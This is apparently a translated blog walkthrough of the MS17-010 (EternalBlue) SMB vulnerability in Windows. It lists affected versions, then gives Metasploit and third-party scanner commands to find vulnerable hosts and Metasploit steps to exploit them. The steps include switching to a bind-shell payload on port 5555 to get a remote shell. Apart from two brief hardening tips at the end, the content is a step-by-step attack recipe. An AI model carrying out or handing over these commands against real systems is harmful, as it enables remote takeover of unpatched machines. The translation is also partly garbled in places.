table of Contents
Vulnerability description
The attacker sends a specially designed message to the Microsoft server message block SMB server. The most serious vulnerability may allow remote code execution.
Impact version
- Windows Vista
- Windows 7
- Windows 8.1
- Windows RT 8.1
- Windows 10
- Windows Server 2008 Japanese Windows Server 2008 R2
- Windows Server 2012 Japanese Windows Server 2012 R2
- Windows Server 2016
…
Vulnerability detection
time
#启动msf
msfconsole
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
#设置目标ip
set rhosts 192.168.234.132
run
Tip Host is likely VULNERABLE to MS17-010
vulnerability is present
windows
Use tool:
https://github.com/holmesian/ms17_010_scan
Single ip detection:
#ms17010scan-h-n-amd64-1.exe -h ip
ms17010scan-h-n-amd64-1.exe -h 192.168.234.132
Multi-ip scanning:
#ms17010scan-h-n-amd64-1.exe -n ip/24
ms17010scan-h-n-amd64-1.exe -n 192.168.234.0/24
Exploit
TIME:
#启动msf
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
#设置目标ip
set rhosts 192.168.234.132
run
No public network ip rebound shell
Assuming that you only have a PC and no public network ip accepts the shell returned by the vulnerability, you only need to change the MSF attack payload.
#查看攻击在和
show payloads
#修改攻击载荷为 generic/shell_bind_tcp
set payload 1
#查看配置,我们只需要设置
show options
#设置目标ip
set rhost 192.168.234.134
set lport 5555
run
My understanding is that the generic/shell_bind_tcp payload is to open port 5555 on the target machine, and we go to actively connect to get the shell.
The original windows/x64/meterpreter/reverse_tcp is to let the other party actively connect to the port we are listening on
Vulnerability hardening
1. Update the operating system patch.
2. Shut down redundant ports such as 139 and 445 of the operating system.